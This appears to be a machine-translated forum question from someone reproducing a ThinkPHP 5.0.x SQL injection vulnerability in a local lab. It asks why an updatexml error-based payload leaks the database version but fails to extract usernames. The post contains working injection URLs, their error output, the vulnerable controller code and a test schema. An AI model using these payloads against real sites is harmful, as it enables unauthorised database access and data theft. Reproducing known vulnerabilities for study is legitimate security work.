php - thinkphp5.0.x调试中的sql_injection漏洞

问题描述

我正在重新创建一个关于的 sql 注入漏洞thinkphp5.0.x

我已经可以得到version()但是我不能得到字段内容，它说：

SQLSTATE[HY000]: General error: 1105 Only constant XPATH queries are supported`
为什么？</p>

思考php 5.0.15
php 7.2

payload1： http:
//127.0.0.1/thinkphp5.0.15/public/index.php/index/index/index?password[0]=inc&password[1]=updatexml(1,concat(0x7e,version(),0x7e) ,1)&密码[2]=1

回声1：

SQLSTATE[HY000]：一般错误：1105 XPATH 语法错误：'~5.5.53~'

payload2： http:
//127.0.0.1/thinkphp5.0.15/public/index.php/index/index/index ?password[0]=inc&password[1]=updatexml(1,concat(0x7e,(select%20username%20from %20用户限制 0,1),0x7e),1)&密码[2]=1

回声2：

SQLSTATE [HY000]：一般错误：1105 仅支持常量 XPATH 查询，但它在 mysql 中的回显是正确的：mysql> INSERT INTO user( password) VALUES (updatexml(1,concat(0x7e,(select username from user limit 0,1)) ,1)+1); 错误 1105 (HY000): XPATH 语法错误: '~test'

//index.php
<?php
namespace app\index\controller;
use think\Db;
class Index
{
    public function index()
    {
        $password = input("get.password/a");
        Db::table("user")->where(["id"=>1])->insert(["password"=>$password]);
        return "ThinkPHP SQL Test.";
    }
}

//mysql.sql
# Host: localhost  (Version: 5.5.53)
# Date: 2019-07-15 10:10:05
# Generator: MySQL-Front 5.3  (Build 4.234)

/*!40101 SET NAMES utf8 */;
create database thinkphp;

use thinkphp;
#
# Structure for table "user"
#

DROP TABLE IF EXISTS `user`;
CREATE TABLE `user` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `username` varchar(50) DEFAULT NULL,
  `password` varchar(50) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

#
# Data for table "user"
#

INSERT INTO `user` VALUES (1,'test','password');

我希望输出是 SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~test'

标签： phpmysqlthinkphpctf